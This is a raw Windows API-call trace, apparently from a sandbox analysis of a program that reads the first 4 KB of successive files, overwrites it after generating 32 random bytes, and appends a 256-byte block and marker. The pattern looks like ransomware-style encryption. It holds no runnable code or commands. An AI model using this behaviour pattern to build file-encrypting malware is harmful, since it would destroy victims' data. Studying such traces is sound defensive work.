[0078.044] WriteFile (in: hFile=0x7e8, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0078.044] GetProcessHeap () returned 0x4f10000 [0078.044] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0078.044] GetProcessHeap () returned 0x4f10000 [0078.044] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0078.044] GetProcessHeap () returned 0x4f10000 [0078.044] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0078.044] CloseHandle (hObject=0x7e8) returned 1 [0078.045] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 28 [0078.045] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.045] ReadFile (in: hFile=0x7ec, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0078.045] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.045] GetProcessHeap () returned 0x4f10000 [0078.045] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0078.045] GetProcessHeap () returned 0x4f10000 [0078.045] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0078.046] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0078.046] GetProcessHeap () returned 0x4f10000 [0078.046] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0078.046] ReadFile (in: hFile=0x7ec, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0078.134] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.134] WriteFile (in: hFile=0x7ec, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0078.134] GetProcessHeap () returned 0x4f10000 [0078.134] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0078.134] GetProcessHeap () returned 0x4f10000 [0078.134] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.134] GetProcessHeap () returned 0x4f10000 [0078.134] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0078.134] GetProcessHeap () returned 0x4f10000 [0078.134] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.134] GetProcessHeap () returned 0x4f10000 [0078.134] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0078.134] GetProcessHeap () returned 0x4f10000 [0078.134] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.134] GetProcessHeap () returned 0x4f10000 [0078.134] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.134] GetProcessHeap () returned 0x4f10000 [0078.135] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.135] GetProcessHeap () returned 0x4f10000 [0078.135] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.135] GetProcessHeap () returned 0x4f10000 [0078.135] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.135] GetProcessHeap () returned 0x4f10000 [0078.135] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.135] GetProcessHeap () returned 0x4f10000 [0078.135] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.135] GetProcessHeap () returned 0x4f10000 [0078.135] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.135] GetProcessHeap () returned 0x4f10000 [0078.135] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.135] GetProcessHeap () returned 0x4f10000 [0078.135] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.135] GetProcessHeap () returned 0x4f10000 [0078.135] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.135] GetProcessHeap () returned 0x4f10000 [0078.135] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.135] GetProcessHeap () returned 0x4f10000 [0078.135] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.135] GetProcessHeap () returned 0x4f10000 [0078.135] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.135] GetProcessHeap () returned 0x4f10000 [0078.135] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.135] GetProcessHeap () returned 0x4f10000 [0078.135] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.135] GetProcessHeap () returned 0x4f10000 [0078.135] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.135] GetProcessHeap () returned 0x4f10000 [0078.135] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.135] GetProcessHeap () returned 0x4f10000 [0078.135] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.135] GetProcessHeap () returned 0x4f10000 [0078.135] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.135] GetProcessHeap () returned 0x4f10000 [0078.135] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.135] GetProcessHeap () returned 0x4f10000 [0078.136] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.136] GetProcessHeap () returned 0x4f10000 [0078.136] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.136] GetProcessHeap () returned 0x4f10000 [0078.136] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.136] GetProcessHeap () returned 0x4f10000 [0078.136] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.136] GetProcessHeap () returned 0x4f10000 [0078.136] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.136] GetProcessHeap () returned 0x4f10000 [0078.136] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.136] GetProcessHeap () returned 0x4f10000 [0078.136] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.136] GetProcessHeap () returned 0x4f10000 [0078.136] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.136] GetProcessHeap () returned 0x4f10000 [0078.136] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.136] GetProcessHeap () returned 0x4f10000 [0078.136] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.136] GetProcessHeap () returned 0x4f10000 [0078.136] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.136] GetProcessHeap () returned 0x4f10000 [0078.136] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.136] GetProcessHeap () returned 0x4f10000 [0078.136] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0078.136] GetProcessHeap () returned 0x4f10000 [0078.136] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.136] GetProcessHeap () returned 0x4f10000 [0078.136] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0078.136] GetProcessHeap () returned 0x4f10000 [0078.136] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0078.136] GetProcessHeap () returned 0x4f10000 [0078.136] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0078.136] GetProcessHeap () returned 0x4f10000 [0078.136] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0078.136] GetProcessHeap () returned 0x4f10000 [0078.136] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0078.136] GetProcessHeap () returned 0x4f10000 [0078.136] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0078.137] GetProcessHeap () returned 0x4f10000 [0078.137] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x1f8) returned 0x7cf6bf8 [0078.137] GetProcessHeap () returned 0x4f10000 [0078.137] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0078.137] GetProcessHeap () returned 0x4f10000 [0078.137] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.137] GetProcessHeap () returned 0x4f10000 [0078.137] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0078.137] GetProcessHeap () returned 0x4f10000 [0078.137] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.137] GetProcessHeap () returned 0x4f10000 [0078.137] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.137] GetProcessHeap () returned 0x4f10000 [0078.137] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.137] GetProcessHeap () returned 0x4f10000 [0078.137] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.137] GetProcessHeap () returned 0x4f10000 [0078.137] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.137] GetProcessHeap () returned 0x4f10000 [0078.137] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.137] GetProcessHeap () returned 0x4f10000 [0078.137] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.137] GetProcessHeap () returned 0x4f10000 [0078.137] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.137] GetProcessHeap () returned 0x4f10000 [0078.137] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.137] GetProcessHeap () returned 0x4f10000 [0078.137] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.137] GetProcessHeap () returned 0x4f10000 [0078.138] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.138] GetProcessHeap () returned 0x4f10000 [0078.138] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.138] GetProcessHeap () returned 0x4f10000 [0078.138] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.138] GetProcessHeap () returned 0x4f10000 [0078.138] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.138] GetProcessHeap () returned 0x4f10000 [0078.138] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.138] GetProcessHeap () returned 0x4f10000 [0078.138] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.138] GetProcessHeap () returned 0x4f10000 [0078.138] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.138] GetProcessHeap () returned 0x4f10000 [0078.138] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.138] GetProcessHeap () returned 0x4f10000 [0078.138] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.138] GetProcessHeap () returned 0x4f10000 [0078.138] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.138] GetProcessHeap () returned 0x4f10000 [0078.138] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.138] GetProcessHeap () returned 0x4f10000 [0078.138] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.138] GetProcessHeap () returned 0x4f10000 [0078.138] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0078.138] GetProcessHeap () returned 0x4f10000 [0078.138] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.138] GetProcessHeap () returned 0x4f10000 [0078.138] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0078.138] GetProcessHeap () returned 0x4f10000 [0078.139] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0078.139] GetProcessHeap () returned 0x4f10000 [0078.139] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0078.139] GetProcessHeap () returned 0x4f10000 [0078.139] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0078.139] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.139] WriteFile (in: hFile=0x7ec, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0078.139] WriteFile (in: hFile=0x7ec, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0078.139] GetProcessHeap () returned 0x4f10000 [0078.139] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0078.139] GetProcessHeap () returned 0x4f10000 [0078.139] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0078.139] GetProcessHeap () returned 0x4f10000 [0078.139] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0078.139] CloseHandle (hObject=0x7ec) returned 1 [0078.141] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 29 [0078.141] SetFilePointerEx (in: hFile=0x7f0, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.141] ReadFile (in: hFile=0x7f0, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0078.141] SetFilePointerEx (in: hFile=0x7f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.141] GetProcessHeap () returned 0x4f10000 [0078.141] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0078.141] GetProcessHeap () returned 0x4f10000 [0078.141] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0078.141] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0078.141] GetProcessHeap () returned 0x4f10000 [0078.141] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0078.141] ReadFile (in: hFile=0x7f0, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0078.381] SetFilePointerEx (in: hFile=0x7f0, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.381] WriteFile (in: hFile=0x7f0, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0078.381] GetProcessHeap () returned 0x4f10000 [0078.381] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0078.381] GetProcessHeap () returned 0x4f10000 [0078.381] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.381] GetProcessHeap () returned 0x4f10000 [0078.381] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0078.381] GetProcessHeap () returned 0x4f10000 [0078.381] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.382] GetProcessHeap () returned 0x4f10000 [0078.382] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0078.382] GetProcessHeap () returned 0x4f10000 [0078.382] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.382] GetProcessHeap () returned 0x4f10000 [0078.382] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.382] GetProcessHeap () returned 0x4f10000 [0078.382] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.382] GetProcessHeap () returned 0x4f10000 [0078.382] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.382] GetProcessHeap () returned 0x4f10000 [0078.382] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.382] GetProcessHeap () returned 0x4f10000 [0078.382] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.382] GetProcessHeap () returned 0x4f10000 [0078.382] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.382] GetProcessHeap () returned 0x4f10000 [0078.382] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.382] GetProcessHeap () returned 0x4f10000 [0078.382] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.382] GetProcessHeap () returned 0x4f10000 [0078.382] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.382] GetProcessHeap () returned 0x4f10000 [0078.382] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.382] GetProcessHeap () returned 0x4f10000 [0078.382] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.382] GetProcessHeap () returned 0x4f10000 [0078.382] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.382] GetProcessHeap () returned 0x4f10000 [0078.382] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.382] GetProcessHeap () returned 0x4f10000 [0078.382] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.382] GetProcessHeap () returned 0x4f10000 [0078.382] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.382] GetProcessHeap () returned 0x4f10000 [0078.382] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.382] GetProcessHeap () returned 0x4f10000 [0078.382] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.383] GetProcessHeap () returned 0x4f10000 [0078.383] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.383] GetProcessHeap () returned 0x4f10000 [0078.383] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.383] GetProcessHeap () returned 0x4f10000 [0078.383] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.383] GetProcessHeap () returned 0x4f10000 [0078.383] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.383] GetProcessHeap () returned 0x4f10000 [0078.383] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.383] GetProcessHeap () returned 0x4f10000 [0078.383] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.383] GetProcessHeap () returned 0x4f10000 [0078.383] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.383] GetProcessHeap () returned 0x4f10000 [0078.383] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.383] GetProcessHeap () returned 0x4f10000 [0078.383] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.383] GetProcessHeap () returned 0x4f10000 [0078.383] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.383] GetProcessHeap () returned 0x4f10000 [0078.383] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.383] GetProcessHeap () returned 0x4f10000 [0078.383] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.383] GetProcessHeap () returned 0x4f10000 [0078.383] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.383] GetProcessHeap () returned 0x4f10000 [0078.383] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.383] GetProcessHeap () returned 0x4f10000 [0078.383] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.383] GetProcessHeap () returned 0x4f10000 [0078.383] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0078.383] GetProcessHeap () returned 0x4f10000 [0078.383] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.383] GetProcessHeap () returned 0x4f10000 [0078.383] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0078.383] GetProcessHeap () returned 0x4f10000 [0078.383] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0078.384] GetProcessHeap () returned 0x4f10000 [0078.384] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0078.384] GetProcessHeap () returned 0x4f10000 [0078.384] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0078.384] GetProcessHeap () returned 0x4f10000 [0078.384] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0078.384] GetProcessHeap () returned 0x4f10000 [0078.384] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0078.384] GetProcessHeap () returned 0x4f10000 [0078.384] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.384] GetProcessHeap () returned 0x4f10000 [0078.384] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0078.384] GetProcessHeap () returned 0x4f10000 [0078.384] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.384] GetProcessHeap () returned 0x4f10000 [0078.384] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.384] GetProcessHeap () returned 0x4f10000 [0078.384] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.384] GetProcessHeap () returned 0x4f10000 [0078.384] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.384] GetProcessHeap () returned 0x4f10000 [0078.384] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.384] GetProcessHeap () returned 0x4f10000 [0078.384] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.384] GetProcessHeap () returned 0x4f10000 [0078.384] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 